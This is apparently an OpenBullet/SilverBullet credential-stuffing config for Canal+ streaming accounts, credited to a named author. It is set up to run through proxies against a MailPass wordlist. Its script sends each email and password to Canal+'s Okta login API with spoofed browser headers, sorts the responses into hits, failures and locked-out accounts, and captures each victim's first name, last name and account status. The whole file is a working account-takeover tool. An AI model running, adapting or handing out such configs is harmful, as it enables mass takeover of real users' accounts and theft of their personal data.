[SETTINGS]
{
  "Name": "Canalplus",
  "SuggestedBots": 150,
  "MaxCPM": 0,
  "LastModified": "2022-02-23T09:24:36.2800466+00:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "🔥 YASHVIRGAMING#7131 🔥",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "Canalplus",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#pass REQUEST POST "https://pass.canalplus.com/api/v1/authn" 
  CONTENT "{\"password\":\"<PASS>\",\"username\":\"<USER>\",\"options\":{\"warnBeforePasswordExpired\":true,\"multiOptionalFactorEnroll\":true},\"stateToken\":\"\"}" 
  CONTENTTYPE "application/json" 
  HEADER "Host: pass.canalplus.com" 
  HEADER "Connection: keep-alive" 
  HEADER "sec-ch-ua: \"Chromium\";v=\"94\", \"Google Chrome\";v=\"94\", \";Not A Brand\";v=\"99\"" 
  HEADER "x-okta-user-agent-extended: okta-signin-widget-4.5.2" 
  HEADER "accept-language: en" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.54 Safari/537.36" 
  HEADER "accept: application/json" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "Origin: https://pass.canalplus.com" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "Content-Length: 193" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "{\"errorCode\":\"" 
    KEY "errorSummary\":\"" 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "LOCKED_OUT" 
  KEYCHAIN Success OR 
    KEY "{\"expiresAt\":\"" 
    KEY "status\":\"SUCCESS" 

#First_name PARSE "<SOURCE>" LR "firstName\":\"" "\"" CreateEmpty=FALSE -> CAP "First Name" 

#Last_Name PARSE "<SOURCE>" LR "lastName\":\"" "\"" CreateEmpty=FALSE -> CAP "Last Name" 

#Status PARSE "<SOURCE>" LR "status\":\"" "\"" CreateEmpty=FALSE -> CAP "status" 

KEYCHECK 
  KEYCHAIN Custom "FREE" OR 
    KEY "<SOURCE>" DoesNotContain "SUCCESS" 
  KEYCHAIN Success OR 
    KEY "SUCCESS" 

FUNCTION Constant "🔥 YASHVIRGAMING#7131 🔥" -> CAP "Config By" 

